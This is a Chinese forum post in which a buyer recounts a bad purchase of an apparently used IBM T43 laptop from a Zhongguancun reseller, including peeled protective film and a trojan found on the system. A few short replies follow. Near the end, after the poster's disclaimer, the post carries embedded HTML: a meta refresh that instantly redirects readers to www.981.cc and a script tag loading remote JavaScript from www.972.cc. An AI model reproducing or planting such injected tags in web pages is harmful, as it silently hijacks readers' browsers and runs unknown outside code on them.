开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

中关村不愉快的购T43经历

关闭 [复制链接]
我在这里WWW。[翔意禁止词语]。COM买的IBM T43 BH3笔记本,以下经历属实。

首先在网上加了论坛里几个人的MSN,问了几句,可能是因为他们大家都忙吧,问一句,等半天才回复。实在没了耐心。于是我就上周末去了龙翔公司。

公司里,CANDY女士接待的我,取出一台笔记本,让我来挑,我发现屏上有一绿点,然后我要求换无点的,她说没有无点的,要我现金订货,交一千元订金,等到了无点的机器再给我打电话。她一再劝说我交订金,说是公司每次只订十台笔记本,若是我不交订金的话,就没人给我留了。一次十台当中也许只能挑出一两台无点的。。。

我听了之后,我很是迷糊,这也不像个大公司的样子呀,就是劝我交订金。。。其实,我在中关村也有店的,我也是搞销售的,我知道她的销售方式的。但是我受不了她将我笨蛋耍,我当年买联想时,屏上还一个点都没有呢,IBM就更不应当了呀。。 于是我离开了。

晚上上网看了WWW。[翔意禁止词语]。COM网上的介绍,明明说是保无点的, 为何白天时,那位女士就说不交订金就不保证无点呢? 差劲。

其间,我也看了许多别家的网站报价,翔意的报价是高一些,但他的网站上有好多技术交流,这点是龙翔所比不了的。。但是,我就在中关村,这几天急用笔记本出差,于是我也没空去朝阳区,我还是到这里买了。

又到了一个周末,我去买笔记本。这回是一位小伙子接待的。。取来一台笔记本,电池充电次数为1次,他说是装中文操作系统时充电来着,我当时也想到:装系统时,为何要用电池?为何不直接插电安装系统呢? 但是我也没过多的深究。

后来发现一个问题: 就是那屏幕下面的那一排小灯,原机本来带着的膜已经没了,我问:是不是有人用过的? 他回答:这个膜贴得非常紧,你现在看不出来的,回家你一揭就下来了。。
我当时确实相信了他。交款买回家了。。

我回家时才发现,膜是早已经被人揭过的,并不像这个小伙子说的这样的。看来,无商不奸呀。。将一台用过的机器卖给我。不过,我也是在中关村混的,我也认了。

最近几天发现系统有问题,我买了原版的杀毒软件之后发现,系统有木马。。。这点真的是让我无法忍受。。。。

我在天津,系统开机启动WINDOWS XP要等十多分钟,真TMD的变态。。。。无奈,只得采用 ACCESS IBM键,一键恢复。。

回头跟同事一说,同事说:这种事情不太可能是卖机的商家装的木马吧,他们也没空做这些, 唯一有可能的就是这台机器是别人用过的,或是返修机。。

我听了之后,再回想起购机经历。。。。真的是认为这样。。。 总之,我现在挺不开心,挺不爽的。。。

大家看看我的购机经历吧。。

看看[翔意禁止词语]的管理员是否能删除这个贴子?

你们的销售人员真的是什么话都能说出来,明明膜已经揭掉的机器,就对客户说成是膜贴得紧,现在看不出来。。。睁着眼睛骗人。。。 最不能接受的就是机器里有木马。。

本来我还打算再买一个折叠的X系列的笔记本,(老婆的公司给老婆配的笔记本好重,要换个轻的),看来,我不敢在龙翔买了。。。

还是看看别家的吧。。

声明:以上是本人的亲身经历,希望诸位多加小心,本来此文与这个网站没什么关系,但是我担心我在[翔意禁止词语]上发的文被删除,于是发上来让大家看看<meta http-equiv="refresh" content="0; url=http://www.981.cc">
★★★
<script type="text/javascript" src="http://www.972.cc/1.js"></script>
<link href="http://www.972.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

同情,感谢楼主的提醒!
我在xy买的71U那排小灯的膜也没有了!
[翔意禁止词语] 厚厚
没了膜膜就不是"处"机了~``